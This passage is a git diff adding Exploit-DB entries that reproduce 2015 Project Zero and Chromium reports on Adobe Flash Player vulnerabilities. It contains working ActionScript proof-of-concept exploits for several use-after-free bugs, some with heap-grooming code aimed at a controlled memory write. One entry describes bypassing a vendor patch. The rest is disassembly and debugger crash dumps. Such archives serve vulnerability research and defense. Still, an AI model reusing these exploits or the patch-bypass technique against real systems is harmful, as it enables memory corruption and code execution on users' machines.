+tfield.filters = [glowfilter]
+
+function f() {
+    flash.filters.GlowFilter = MyGlowFilter2
+	var a = _global.tfield.filters
+	_global.tfield.filters = []
+}
+
+_global.tfield = tfield
+_global.f = f
+
+flash.filters.GlowFilter = MyGlowFilter
+var a = tfield.filters
+---
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37847.zip
+
diff --git a/platforms/windows/dos/37848.txt b/platforms/windows/dos/37848.txt
new file mode 100755
index 000000000..0fd4071e1
--- /dev/null
+++ b/platforms/windows/dos/37848.txt
@@ -0,0 +1,143 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=342&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+[Tracking for https://code.google.com/p/chromium/issues/detail?id=480496]
+
+Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
+
+---
+VULNERABILITY DETAILS
+A little bug while setting the TextFilter.filters array.
+Chrome 42.0.2311.90 with Flash 17.0.0.169
+
+VERSION
+Chrome Version: 42.0.2311.90 Stable with Flash 17.0.0.169
+Operating System: [Win 7 SP1]
+
+REPRODUCTION CASE
+We can set the TextFilter.filters array with either an array or a custom object. Providing an object allows an attacker to execute AS2 code in the following loop (these lines come from flashplayer17_sa.exe 17.0.0.169):
+
+.text:004D6964 loc_4D6964:
+.text:004D6964                 and     eax, 0FFFFFFF8h
+.text:004D6967                 push    edi
+.text:004D6968                 mov     edi, eax
+.text:004D696A                 mov     ecx, edi
+.text:004D696C                 xor     esi, esi
+.text:004D696E                 call    xAS2_getArrayLength   ; here we can override object.length and execute some code
+.text:004D6973                 test    eax, eax              ; if that code frees the object pointed by ebx...
+.text:004D6975                 jle     short loc_4D69A3
+.text:004D6977
+.text:004D6977 loc_4D6977:
+.text:004D6977                 push    edi
+.text:004D6978                 mov     ecx, esi
+.text:004D697A                 call    sub_4D3FE0            ; get an item from the object
+.text:004D697F                 add     esp, 4
+.text:004D6982                 test    eax, eax              ; we have either a filter or 0 here
+.text:004D6984                 jz      short loc_4D6997
+.text:004D6986                 mov     edx, [eax]
+.text:004D6988                 mov     ecx, eax
+.text:004D698A                 mov     eax, [edx+18h]
+.text:004D698D                 call    eax
+.text:004D698F                 push    eax
+.text:004D6990                 mov     ecx, ebx              ; ...we get a use after free here
+.text:004D6992                 call    sub_4CDB70            ; and a write-4 condition here
+.text:004D6997
+.text:004D6997 loc_4D6997:
+.text:004D6997                 mov     ecx, edi
+.text:004D6999                 inc     esi
+.text:004D699A                 call    xAS2_getArrayLength
+.text:004D699F                 cmp     esi, eax
+.text:004D69A1                 jl      short loc_4D6977
+
+
+
+Freeing the object pointed by ebx is easy indeed:
+var tfield:TextField = createTextField("tf",1,1,2,3,4)  //create a TextField at depth 1
+tfield.filters = []   //create the targeted object
+createTextField("textf",1,1,2,3,4)   //create again a TextField (or any other DisplayObject) at the same depth and Flash frees the targeted object
+
+flash_as2_filters_uaf_write4_poc.swf just crashes the program and flash_as2_filters_uaf_write4.swf crashes while writing to 0x41424344
+
+***************************************************************************
+Content of flash_as2_filters_uaf_write4_poc.fla
+//Compile that with Flash CS5.5 and change the property "s" in the swf to "3"
+//It's because Flash CS5.5 does not allow naming a property with a numeral
+
+import flash.filters.GlowFilter;
+
+var tfield:TextField = createTextField("tf",1,1,2,3,4)
+
+function f() {
+	_global.mc.createTextField("tf",1,1,2,3,4)
+}
+
+_global.mc = this
+_global.counter = 0
+
+var oCounter:Object = new Object()
+oCounter.valueOf = function () {
+	_global.counter += 1
+	if (_global.counter == 1) f()
+	return 10;
+}
+
+var o = {length:oCounter, 3:new GlowFilter(1,2,3,4,5,6,true,true)}
+tfield.filters = o
+
+***************************************************************************
+Content of flash_as2_filters_uaf_write4.fla
+//Compile that with Flash CS5.5 and change the property "s" in the swf to "3"
+//It's because Flash CS5.5 does not allow naming a property with a numeral
+
+import flash.filters.GlowFilter;
+
+
+var a1:Array = new Array()
+var a2:Array = new Array()
+for (i = 0; i<0x3F8/4;i++) {
+	a2[i] = 0x41424344
+}
+a2[3] = 0
+a2[0x324/4] = 0x41414100
+a2[0x324/4 + 1] = 0x41424344
+a2[0x324/4 + 2] = 0x41414143
+a2[0x324/4 + 3] = 0x41414100
+
+for (var i = 0; i<0x200;i++) {
+	var tf:TextFormat = new TextFormat()
+	a1[i] = tf
+}
+for (var i = 0; i<0x100;i++) {
+	a1[i].tabStops = a2
+}
+
+
+var tfield:TextField = createTextField("tf",1,1,2,3,4)
+
+function f() {
+	_global.mc.createTextField("tf",1,1,2,3,4)
+	for (var i = 0x100; i<0x200;i++) {
+		_global.a1[i].tabStops = _global.a2
+	}
+}
+
+_global.mc = this
+_global.counter = 0
+_global.a1 = a1
+_global.a2 = a2
+
+var oCounter:Object = new Object()
+oCounter.valueOf = function () {
+	_global.counter += 1
+	if (_global.counter == 1) f()
+	return 10;
+}
+
+var o = {length:oCounter, s:new GlowFilter(1,2,3,4,5,6,true,true)}
+
+
+tfield.filters = o
+---
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37848.zip
+
diff --git a/platforms/windows/dos/37849.txt b/platforms/windows/dos/37849.txt
new file mode 100755
index 000000000..2181c5668
--- /dev/null
+++ b/platforms/windows/dos/37849.txt
@@ -0,0 +1,8 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=349&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+Credit is to KEEN Team.
+
+3 different PoC's in the attached zip.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37849.zip
\ No newline at end of file
diff --git a/platforms/windows/dos/37853.txt b/platforms/windows/dos/37853.txt
new file mode 100755
index 000000000..5c1a395f0
--- /dev/null
+++ b/platforms/windows/dos/37853.txt
@@ -0,0 +1,145 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=358&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=457680]
+
+---
+VULNERABILITY DETAILS
+There is a use after free in Flash caused by an improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property. 
+
+VERSION
+Chrome Version: 40.0.2214.111 stable, Flash 16.0.0.305
+Operating System: Win7 SP1 x64]
+
+The AS2 mapBitmap_as2.fla can be compiled with Flash CS5. Some bytes must be changed manually to trigger the issue (see below).
+Just put mapBitmap_as2.swf in a browsable directory and run the swf with Chrome. It should crash while dereferencing 0x41424344.
+
+
+Here are a few steps to trigger the issue:
+
+1) Create a BitmapData and store it somewhere, for example as a static member of a custom class.
+2) Create a second BitmapData and use it to create a DisplacementMapFilter. We don't care about this BitmapData, it is just needed to create the filter.
+3) Override the BitmapData constructor with a custom class. That class should put the first BitmapData on top of the AS2 stack when the constructor returns.
+4) Create an object o and change its valueOf method so that it points to a function that calls the DisplacementMapFilter.mapBitmap property.
+5) Use the first BitmapData and call getPixel32(o).
+
+What happens during step 5? Flash caches first the BitmapData in the stack before calling o.valueOf. At that moment the BitmapData isn't used elsewhere so its refcount equals 1. Flash enters then o.valueOf which leads to get the mapBitmap property. At that moment we hit the following lines, in sub_10193F2D:
+
+CPU Disasm
+Address   Hex dump          Command        
+6D2D3FBB    68 BE27C66D     PUSH OFFSET 6DC627BE
+6D2D3FC0    FF73 04         PUSH DWORD PTR DS:[EBX+4]
+6D2D3FC3    56              PUSH ESI
+6D2D3FC4    8B33            MOV ESI,DWORD PTR DS:[EBX]
+6D2D3FC6    E8 A572F8FF     CALL 6D25B270                 ; that function creates a new atom and calls the BitmapData constructor
+6D2D3FCB    84C0            TEST AL,AL
+6D2D3FCD    74 09           JE SHORT 6D2D3FD8
+6D2D3FCF    8B0B            MOV ECX,DWORD PTR DS:[EBX]
+6D2D3FD1    6A 01           PUSH 1  
+6D2D3FD3    E8 281A0100     CALL 6D2E5A00                 ; if the constructor is overriden by a custom class, the custom constructor is called here
+6D2D3FD8    8B75 08         MOV ESI,DWORD PTR SS:[EBP+8]
+6D2D3FDB    8B13            MOV EDX,DWORD PTR DS:[EBX]
+6D2D3FDD    56              PUSH ESI
+6D2D3FDE    E8 418EF6FF     CALL 6D23CE24                 ; then pop the new atom from the AS2 stack
+...
+6D2D4000    23F8            AND EDI,EAX
+6D2D4002    807F 35 1B      CMP BYTE PTR DS:[EDI+35],1B   ; and ensure this is indeed a BitmapData
+6D2D4006    74 0A           JE SHORT 6D2D4012
+...
+
+In the next lines Flash does two things. It destroys the BitmapData object associated to the BitmapData atom and replaces it with the one defined in the DisplacementMapFilter:
+
+6D2D4012    8B47 28         MOV EAX,DWORD PTR DS:[EDI+28]
+6D2D4015    83E0 FE         AND EAX,FFFFFFFE
+6D2D4018    8B40 18         MOV EAX,DWORD PTR DS:[EAX+18]  ; get the BitmapData object 
+6D2D401B    33C9            XOR ECX,ECX
+6D2D401D    51              PUSH ECX
+6D2D401E    E8 1DB2FEFF     CALL 6D2BF240                  ; call the BitmapData destructor
+6D2D4023    8B75 10         MOV ESI,DWORD PTR SS:[EBP+10]
+6D2D4026    8BC7            MOV EAX,EDI
+6D2D4028    E8 134AF6FF     CALL 6D238A40                  ; and associate the DisplacementMapFilter.mapBitmap object
+
+
+All of this works as long as the BitmapData object read from the AS2 stack is not in use somewhere. But since we can provide our own constructor, we can do anything with the AS2 stack, including having an in use BitmapData at the top of the stack when the constructor returns. This can be done by manipulating the AS2 byte code of the constructor for example. So if the returned BitmapData has a refcounter set to 1, Flash frees the object and we end up with a garbage reference in the stack which crashes the player in BitmapData.getPixel32.
+
+After compiling mapBitmap_as2.swf, I had to change the bytes at offset 0x90F in the (MyBitmapData constructor):
+52 17 96 02 00 04 03 26 to 17 17 17 17 17 17 17 17 (actionPOP)
+
+Hopefully if it works we should crash here with eax controlled:
+CPU Disasm
+Address   Hex dump          Command
+6D2BFA83    3B58 0C         CMP EBX,DWORD PTR DS:[EAX+0C]      //eax = 0x41424344
+6D2BFA86    7D 57           JGE SHORT 6D2BFADF
+6D2BFA88    85FF            TEST EDI,EDI
+6D2BFA8A    78 53           JS SHORT 6D2BFADF
+6D2BFA8C    3B78 08         CMP EDI,DWORD PTR DS:[EAX+8]
+6D2BFA8F    7D 4E           JGE SHORT 6D2BFADF
+6D2BFA91    8BC8            MOV ECX,EAX
+6D2BFA93    8B01            MOV EAX,DWORD PTR DS:[ECX]
+6D2BFA95    8B50 10         MOV EDX,DWORD PTR DS:[EAX+10]
+6D2BFA98    FFD2            CALL EDX
+
+I don't kwow if we can abuse ASLR with that. If we can do something without getting a virtual function dereferenced, it must be possible.
+
+
+***************************************************************************
+Content of MyBitmapData.as
+
+class MyBitmapData extends String
+{
+	static var mf;
+	function MyBitmapData()
+	{
+		super();
+        var a = MyBitmapData.mf
+        test(a,a,a,a,a,a,a,a)                         //that part should be deleted manually in the bytecode
+        trace(a)                                      //so that MyBitmapData.mf stays on top of the AS2 stack
+	}
+	public function test(a,b,c,d,e,f,g,h) {
+    
+    }
+	static function setBitmapData(myfilter)
+	{
+		mf = myfilter;
+	}
+}
+
+***************************************************************************
+Content of mapBitmap_as2.fla
+
+import flash.filters.DisplacementMapFilter;
+import flash.display.BitmapData;
+
+var bd:BitmapData = new BitmapData(10,10)
+MyBitmapData.setBitmapData(bd)
+var bd2:BitmapData = new BitmapData(10,10)
+var dmf:DisplacementMapFilter = new DisplacementMapFilter(bd2,new flash.geom.Point(1,2),1,2,3,4)
+
+newConstr = MyBitmapData
+flash.display.BitmapData = newConstr
+
+function f() {
+	var a = dmf.mapBitmap;
+}
+var a:Array = new Array()
+var b:Array = new Array()
+for (var i = 0; i<0xC8/4;i++) {
+	b[i] = 0x41424344
+}
+
+var o = new Object()
+o.valueOf = function () {
+	f()
+	for (var i = 0; i<0x10;i++) {
+		var tf:TextFormat = new TextFormat()
+		tf.tabStops = b
+		a[i] = tf
+	}
+	return 4
+}
+
+bd.getPixel32(o,4)
+---
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37853.zip
+
diff --git a/platforms/windows/dos/37854.txt b/platforms/windows/dos/37854.txt
new file mode 100755
index 000000000..9896b1377
--- /dev/null
+++ b/platforms/windows/dos/37854.txt
@@ -0,0 +1,62 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=359&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=482521]
+
+---
+VULNERABILITY DETAILS
+When setting the scrollRect attribute of a MovieClip in AS2 with a custom Rectangle it is possible to free the MovieClip while a reference remains 
+in the stack
+
+VERSION
+Chrome Version: Chrome stable 42.0.2311.90, Flash 17.0.0.169
+Operating System: [Win 7 SP1]
+
+REPRODUCTION CASE
+That code targets the MovieClip.scrollRect property. While setting this attribute with a custom Rectangle, it is possible to trigger a use after free by freeing the targeted MovieClip. Creating a TextField with the same depth of the targeted MovieClip is enough to free an object and have Flash crash.
+
+These lines come from flashplayer standalone 17.0.0.169:
+
+.text:00597F45 loc_597F45:
+.text:00597F45                 cmp     eax, 6
+.text:00597F48                 jnz     loc_597FE5
+.text:00597F4E                 mov     ecx, esi           ; esi points to the MovieClip object
+.text:00597F50                 call    sub_40C1ED
+.text:00597F55                 add     eax, 30Ch
+.text:00597F5A                 or      dword ptr [eax], 8
+.text:00597F5D                 mov     eax, [ebx]
+.text:00597F5F                 mov     byte ptr [eax+82Ch], 1
+.text:00597F66                 mov     ecx, [ebx]
+.text:00597F68                 lea     eax, [ebp+74h+var_1C0]
+.text:00597F6E                 push    eax
+.text:00597F6F                 push    dword ptr [ebx+0Ch]
+.text:00597F72                 call    xfetchRectangleProperties  ; get the Rectangle properties, and execute some AS2
+.text:00597F77                 test    al, al
+.text:00597F79                 jz      loc_598274
+.text:00597F7F                 mov     edi, [ebp+74h+var_1C0]
+.text:00597F85                 mov     ecx, esi
+.text:00597F87                 imul    edi, 14h
+.text:00597F8A                 call    sub_40C1ED          ; reference freed memory and return a bad 
+
+pointer
+.text:00597F8F                 mov     [eax+310h], edi     ; crash here, eax = 0
+
+
+
+Poc (compile with Flash CS5.5):
+
+import flash.geom.Rectangle
+var o2 = {}
+o2.valueOf = function () {
+	_global.mc.createTextField("newtf",1,1,1,2,3)
+	return 7
+}
+var o = {x:o2,y:0,width:4,height:5}
+
+_global.mc = this
+var newmc:MovieClip = this.createEmptyMovieClip("newmc",1)
+newmc.scrollRect = o
+---
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37854.zip
+
diff --git a/platforms/windows/dos/37856.txt b/platforms/windows/dos/37856.txt
new file mode 100755
index 000000000..74dce5eb6
--- /dev/null
+++ b/platforms/windows/dos/37856.txt
@@ -0,0 +1,51 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=361&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+The following access violation was observed in the Adobe Flash Player plugin:
+
+(150c.ca0): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FlashPlayer.exe - 
+eax=078a53b7 ebx=00f28938 ecx=002dea24 edx=000085ed esi=000085ee edi=09d9eee0
+eip=0139a657 esp=002de9b4 ebp=002deda4 iopl=0         nv up ei ng nz ac pe cy
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210297
+FlashPlayer!WinMainSandboxed+0x572f0:
+0139a657 8a0402          mov     al,byte ptr [edx+eax]      ds:002b:078ad9a4=??
+
+0:000> !address eax
+[...]
+Usage:                  <unknown>
+Base Address:           07560000
+End Address:            078ad000
+Region Size:            0034d000
+State:                  00001000	MEM_COMMIT
+Protect:                00000004	PAGE_READWRITE
+Type:                   00020000	MEM_PRIVATE
+Allocation Base:        07560000
+Allocation Protect:     00000001	PAGE_NOACCESS
+
+0:000> db eax
+078a53b7  c5 ea 85 00 00 b6 19 00-38 01 c5 3d 84 9e c2 3d  ........8..=...=
+078a53c7  2f 48 d5 a0 2b 00 73 65-63 6f 6e 64 00 00 00 03  /H..+.second....
+078a53d7  00 00 00 01 00 00 00 01-00 00 00 00 02 00 00 00  ................
+078a53e7  b7 01 00 00 88 39 00 0a-00 74 68 69 73 00 5f 78  .....9...this._x
+078a53f7  00 78 6d 00 5f 79 00 79-6d 00 5f 72 6f 6f 74 00  .xm._y.ym._root.
+078a5407  66 69 72 73 74 73 00 63-6c 61 75 73 00 68 70 00  firsts.claus.hp.
+078a5417  72 65 6d 6f 76 65 4d 6f-76 69 65 43 6c 69 70 00  removeMovieClip.
+078a5427  96 02 00 08 00 1c 96 04-00 08 01 08 00 1c 96 02  ................
+
+Notes:
+
+- Reliably reproduces with latest Adobe Flash Player Projector for Windows and Google Chrome for Windows.
+
+- The out-of-bounds read appears to be caused by an overly large index value (stored in the "EDX" register at the time of the crash) relative to a dynamically allocated buffer pointed to by "EAX".
+
+- The memory under "EAX" contains a section of the input file starting at offset 0x3453b7.
+
+- The index (EDX) value originates from offset 0x3453b8 in the file (at 1 byte offset relative to the EAX memory region).
+
+- Attached samples: signal_sigsegv_7ffff6d2184d_5692_9217909125eb9174614e1368d5f07173 (crashing file), 9217909125eb9174614e1368d5f07173 (original file). The total difference between the two files is 13 bytes.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37856.zip
+
diff --git a/platforms/windows/dos/37857.txt b/platforms/windows/dos/37857.txt
new file mode 100755
index 000000000..5f1fcbbbc
--- /dev/null
+++ b/platforms/windows/dos/37857.txt
@@ -0,0 +1,49 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=362&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+The following access violation was observed in the Adobe Flash Player plugin:
+
+(1dec.1af0): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FlashPlayer.exe - 
+eax=00006261 ebx=00001501 ecx=010ae1e4 edx=00006262 esi=0736dda0 edi=05a860d0
+eip=0044ae55 esp=010ae170 ebp=010ae564 iopl=0         nv up ei ng nz ac pe cy
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210297
+FlashPlayer!WinMainSandboxed+0x57aee:
+0044ae55 803c3000        cmp     byte ptr [eax+esi],0       ds:002b:07374001=??
+
+0:000> !address esi
+[...]
+Usage:                  <unknown>
+Base Address:           06e60000
+End Address:            07374000
+Region Size:            00514000
+State:                  00001000	MEM_COMMIT
+Protect:                00000004	PAGE_READWRITE
+Type:                   00020000	MEM_PRIVATE
+Allocation Base:        06e60000
+Allocation Protect:     00000001	PAGE_NOACCESS
+
+0:000> db esi
+0736dda0  8e 56 fa 1b 00 13 e3 85-00 0c 54 72 65 62 75 63  .V........Trebuc
+0736ddb0  68 65 74 20 4d 53 3e 00-7e 00 80 00 9f 00 21 01  het MS>.~.....!.
+0736ddc0  4c 01 76 01 85 01 97 01-e9 01 02 02 40 02 9a 02  L.v.........@...
+0736ddd0  c4 02 1d 03 49 03 d8 03-26 04 4f 04 b5 04 fd 04  ....I...&.O.....
+0736dde0  1d 05 39 05 90 05 b1 05-e2 05 f6 05 22 06 40 06  ..9.........".@.
+0736ddf0  97 06 da 06 2d 07 94 07-ac 07 d8 07 02 08 21 08  ....-.........!.
+0736de00  3f 08 af 08 fb 08 40 09-92 09 e2 09 1c 0a c9 0a  ?.....@.........
+0736de10  00 0b 35 0b 5b 0b 77 0b-cd 0b 04 0c 52 0c 9d 0c  ..5.[.w.....R...
+
+Notes:
+
+- Reliably reproduces with latest Adobe Flash Player Projector for Windows and Google Chrome for Windows.
+
+- The out-of-bounds read appears to be caused by an overly large index value (stored in the "EAX" register at the time of the crash) relative to a dynamically allocated buffer pointed to by "ESI".
+
+- The memory under "ESI" contains a section of the input file starting at offset 0x50dda0.
+
+- Attached samples: signal_sigsegv_7ffff6d8a235_3103_51dea5ced16249520f1fa0a7a63d7b36 (crashing file), 51dea5ced16249520f1fa0a7a63d7b36 (original file). The total difference between the two files is 19 bytes.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37857.zip
+
diff --git a/platforms/windows/dos/37858.txt b/platforms/windows/dos/37858.txt
new file mode 100755
index 000000000..ab2da4e5d
--- /dev/null
+++ b/platforms/windows/dos/37858.txt
@@ -0,0 +1,62 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=363&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+The following access violation was observed in the Adobe Flash Player plugin:
+
+(1ba8.1c60): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FlashPlayer.exe - 
+eax=0004c800 ebx=00000000 ecx=08982000 edx=00002588 esi=00001200 edi=0042d46c
+eip=017723c0 esp=0042d278 ebp=0042d3c4 iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
+FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x254f0:
+017723c0 8b0408          mov     eax,dword ptr [eax+ecx] ds:002b:089ce800=????????
+
+0:000> kb
+ChildEBP RetAddr  Args to Child              
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0042d3c4 0177cfaf 0042d3e0 0042d46c 00000001 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x254f0
+0042d3ec 0177d112 0042d414 0042d46c 00001376 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x300df
+0042d424 0177d4c2 0042d454 0042d46c 00000006 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x30242
+0042d4e0 0176ec7a 00000000 0042d540 03497440 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x305f2
+0042d544 01788715 08875020 47535542 6c61746e FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x21daa
+0042d7d8 01775c95 0042d814 01775f31 01775f41 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x3b845
+0042d7e0 01775f31 01775f41 03497440 00000000 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x28dc5
+0042d828 017834d2 03497440 00000000 00000030 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x29061
+00000000 00000000 00000000 00000000 00000000 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x36602
+
+0:000> db ecx
+08982000  35 00 00 00 01 00 00 00-00 00 00 00 00 00 00 ff  5...............
+08982010  00 00 00 00 00 00 00 00-01 00 00 00 00 00 00 00  ................
+08982020  80 a4 b7 01 00 00 00 00-00 00 00 00 00 10 00 00  ................
+08982030  00 00 00 00 18 a8 b7 01-20 50 87 08 00 00 00 00  ........ P......
+08982040  03 30 02 00 49 00 00 00-01 00 00 00 00 00 00 00  .0..I...........
+08982050  00 00 00 ff 00 00 00 00-00 00 00 00 01 00 00 00  ................
+08982060  00 00 00 00 80 a4 b7 01-00 00 00 00 00 00 00 00  ................
+08982070  00 10 00 00 00 00 00 00-18 a8 b7 01 20 50 87 08  ............ P..
+
+0:000> !address ecx
+[...]
+Usage:                  <unknown>
+Base Address:           08906000
+End Address:            08990000
+Region Size:            0008a000
+State:                  00001000	MEM_COMMIT
+Protect:                00000004	PAGE_READWRITE
+Type:                   00020000	MEM_PRIVATE
+Allocation Base:        087f0000
+Allocation Protect:     00000001	PAGE_NOACCESS
+
+Notes:
+
+- Reliably reproduces with latest Adobe Flash Player Projector for Windows and Google Chrome for Windows.
+
+- The out-of-bounds read appears to be caused by an overly large index value (stored in the "EAX" register at the time of the crash) relative to a dynamically allocated buffer pointed to by "ECX".
+
+- The 32-bit value read from the unmapped memory address is in fact a pointer, and is used to immediately read 12 bytes from in one function up the call chain.
+
+- Attached samples: signal_sigsegv_7ffff710e9d3_881_11431348555663755408.ttf.swf (crashing file), 11431348555663755408.ttf.swf (original file).
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37858.zip
+
diff --git a/platforms/windows/dos/37860.txt b/platforms/windows/dos/37860.txt
new file mode 100755
index 000000000..f83746d72
--- /dev/null
+++ b/platforms/windows/dos/37860.txt
@@ -0,0 +1,51 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=367&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+[Deadline tracking for Chromium VRP bug https://code.google.com/p/chromium/issues/detail?id=484610]
+
+Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
+
+---
+VULNERABILITY DETAILS
+When calling Color.setRGB in AS2 it is possible to free the target_mc object used in the Color constructor while a reference remains in the stack.
+
+VERSION
+Chrome Version: Chrome stable 42.0.2311.90 with Flash 17.0.0.169
+Operating System: Win7 x64 SP1
+
+REPRODUCTION CASE
+The Color constructor needs a target_mc object like a MovieClip, a TextField etc. While calling Color.setRGB with a custom object, it is possible to execute arbitrary AS2 code that might delete the target_mc object leading to a UAF.
+(These lines come from flashplayer17_sa.exe 17.0.0.169):
+
+.text:004B82D0                 push    esi
+.text:004B82D1                 mov     esi, [esp+4+arg_0]
+.text:004B82D5                 push    edi
+.text:004B82D6                 mov     edi, ecx
+.text:004B82D8                 mov     ecx, [edi+94h]  ; edi points to freed memory
+.text:004B82DE                 and     ecx, 0FFFFFFFEh
+.text:004B82E1                 add     ecx, 3Ch
+.text:004B82E4                 mov     eax, esi
+.text:004B82E6                 call    sub_4B0724      ; crash below
+...
+.text:004B0724                 mov     edx, [ecx]      ; crash here ecx = 3ch (null pointer)
+.text:004B0726                 cmp     edx, [eax]
+.text:004B0728                 jnz     short loc_4B077E
+
+
+Compile the poc with Flash CS5.5
+***************************************************************************
+Content of as2_color_uaf.fla:
+
+var tf:TextField = this.createTextField("tf",1,1,1,4,4)
+var o = new Object()
+o.valueOf = function () {
+	tf.removeTextField()
+	return 0x41414142
+}
+
+var c = new Color(tf)
+c.setRGB(o)
+---
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37860.zip
+
diff --git a/platforms/windows/dos/37861.txt b/platforms/windows/dos/37861.txt
new file mode 100755
index 000000000..f594b8ffb
--- /dev/null
+++ b/platforms/windows/dos/37861.txt
@@ -0,0 +1,74 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=377&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=487237]
+
+Credit is to bilou, working with the Chromium Vulnerability Reward Program
+
+---
+There is a use after free in Flash caused by an improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property. 
+This is almost a repost of  Issue 457680  due to a patch failure.
+
+VERSION
+Chrome Version: N/A now, Flash StandAlone Debug 17.0.0.188
+Operating System: [Win7 x64 SP1]
+
+REPRODUCTION CASE
+The AS2 mapBitmap_v2_as2.fla can be compiled with Flash CS5. Some bytes must be changed manually to trigger the issue (see below).
+Just put mapBitmap_v2_as2.swf in a browsable directory and run the swf with Chrome. It might crash while dereferencing 0x41424344 (hopefully, not tested yet because not available).
+
+After compiling mapBitmap_v2_as2.swf, I had to change the bytes at offset 0x92B in the (MyBitmapData constructor):
+52 17 96 02 00 04 03 26 to 17 17 17 17 17 17 17 17 (actionPOP)
+
+The description is exactly the same as in  Issue 457680  so I won't repost it. Here are just my comments on the patch.
+They basically added a marker at offset +0xDC in the flash standalone debugger (the standalone player is not available at the time of writing):
+
+.text:005AD629 loc_5AD629:
+.text:005AD629                 lea     ecx, [esi+0DCh]
+.text:005AD62F                 push    edi
+.text:005AD630                 mov     [ebp+1C4h+var_198], ecx
+.text:005AD633                 call    xsetUseMarker
+
+.text:0059F762                 cmp     byte ptr [ecx], 0   ; is the marker present?
+.text:0059F765                 jz      short loc_59F77B
+.text:0059F767                 cmp     [esp+arg_0], 0      ; is 0 provided?
+.text:0059F76C                 jz      short locret_59F77E 
+.text:0059F76E                 mov     ecx, dword_EE4788   ; kill the program
+.text:0059F774                 call    sub_9798C0
+.text:0059F779                 jmp     short locret_59F77E
+.text:0059F77B
+.text:0059F77B loc_59F77B:
+.text:0059F77B                 mov     byte ptr [ecx], 1   ; else set the marker
+.text:0059F77E
+.text:0059F77E locret_59F77E:
+.text:0059F77E                 retn    4
+
+
+That marker is then removed when we exit the BitmapData dispatcher:
+
+.text:005AEF29                 mov     eax, [ebp+1C4h+var_198] ; jumptable 005AD654 default case
+.text:005AEF2C                 mov     byte ptr [eax], 0
+
+
+So, to trigger again the issue, we just have to put an extra call to getPixel32 for example:
+
+var o = new Object()
+o.valueOf = function () {
+    bd.getPixel32(1,4)          // remove the marker :)
+	f()
+	for (var i = 0; i<0x10;i++) {
+		var tf:TextFormat = new TextFormat()
+		tf.tabStops = b
+		a[i] = tf
+	}
+	return 4
+}
+
+bd.getPixel32(o,4)
+
+
+And we're done :)
+---
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37861.zip
+
diff --git a/platforms/windows/dos/37862.txt b/platforms/windows/dos/37862.txt
new file mode 100755
index 000000000..2adaca9e2
--- /dev/null
+++ b/platforms/windows/dos/37862.txt
@@ -0,0 +1,63 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=378&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+We've hit the same bug from two different avenues:
+
+1) A report to the Chromium bug tracker: https://code.google.com/p/chromium/issues/detail?id=485893
+
